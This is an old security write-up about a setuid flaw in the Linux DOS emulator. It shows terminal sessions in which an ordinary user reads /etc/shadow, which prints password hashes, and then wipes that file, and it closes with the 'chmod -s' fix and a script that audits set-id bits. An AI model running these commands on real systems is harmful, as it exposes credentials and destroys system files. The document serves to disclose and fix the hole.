Like everything related to MS, which is crap, this emulator found on Linux boxes is buggy as hell and can put your system at risk if it isn't fixed. I'll show how to get around the security of a Linux box running this emulator in its default configuration, and how to fix the problem.
Before you start testing the methods shown here on your own machine, make a backup of /etc/shadow, since we'll use it to demonstrate how insecure this program is.
In this 1st example I'll show how any user can easily grab your password file:
Script started on Thu Mar 2 00:17:48 2000
[struck@localhost ~]$ dos -F /etc/shadow
CPU speed set to 378/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
Error in /etc/shadow: (line 001) unrecognized command 'root:SAlNq/oiIe8ik:11018:0:99999:7:::'
Error in /etc/shadow: (line 002) unrecognized command 'bin:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 003) unrecognized command 'daemon:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 004) unrecognized command 'adm:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 005) unrecognized command 'lp:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 006) unrecognized command 'sync:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 007) unrecognized command 'shutdown:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 008) unrecognized command 'halt:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 009) unrecognized command 'mail:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 010) unrecognized command 'news:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 011) unrecognized command 'uucp:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 012) unrecognized command 'operator:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 013) unrecognized command 'games:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 014) unrecognized command 'gopher:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 015) unrecognized command 'ftp:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 016) unrecognized command 'nobody:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 017) unrecognized command 'postgres:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 018) unrecognized command 'struck:YAOj6uk867WrY:11018:0:99999:7:::'
18 error(s) detected while parsing the configuration-file
Error in (null): (line 019)
Your /etc/shadow script or /etc/dosemu.conf configuration file is obviously
an old style or a too simple one
Please read README.txt on how to upgrade
[struck@localhost ~]$ exit
Script done on Thu Mar 2 00:18:07 2000
The second example shows how easy it is to wipe out your /etc/shadow using dosemu.
Script started on Thu Mar 2 00:19:32 2000
[struck@localhost ~]$ dos -o /etc/shadow
CPU speed set to 378/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
Linux DOS emulator 0.98.1.0 Date: 98/09/12
(Blablablablablabla...)
C:\>exitemu
[struck@localhost ~]$ cat /etc/shadow
[00000330] debug flags:
[00003634] DOS termination requested
[00003636]
[struck@localhost ~]$ exit
Script done on Thu Mar 2 00:20:00 2000
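Now let's move on a bit to the security part...
Both tricks work because dos runs setuid, so it opens whatever file you name with the privileges of the binary's owner rather than your own. The safest fix for these flaws is to remove the setuid bit from dos: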
[root@localhost /root]# whereis dos
dos: /usr/bin/dos /usr/man/man1/dos.1
[root@localhost /root]# chmod -s /usr/bin/dos
[root@localhost /root]#
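To confirm the fix took effect, and to find other set-id binaries that deserve the same review, here is an added example (not part of the original text). The function names are hypothetical; /usr/bin/dos is the path reported by whereis above.

```shell
#!/bin/sh
# Added example: verify and apply the "chmod -s" fix described above.

# suid_status FILE
# Prints "setuid", "setgid", "setuid+setgid", "clean" or "missing".
suid_status() {
    f=$1
    [ -f "$f" ] || { echo "missing"; return 2; }
    s=""
    [ -u "$f" ] && s="setuid"            # -u: set-user-ID bit is set
    [ -g "$f" ] && s="${s:+$s+}setgid"   # -g: set-group-ID bit is set
    echo "${s:-clean}"
}

# list_setid DIR
# Prints every regular file under DIR that carries a set-id bit,
# without crossing into other filesystems.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# strip_setid FILE
# Removes both set-id bits (same effect as "chmod -s" on a file) and
# succeeds only if the file is really clean afterwards.
strip_setid() {
    chmod ug-s "$1" || return 1
    [ "$(suid_status "$1")" = "clean" ]
}

# Report on the binary from this text, or on a path given as argument.
target=${1:-/usr/bin/dos}
echo "$target: $(suid_status "$target")"
```

Running list_setid on /usr/bin and /usr/sbin shows which other programs run with their owner's privileges and take file names from the user.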
That's it! May the force be with you all!!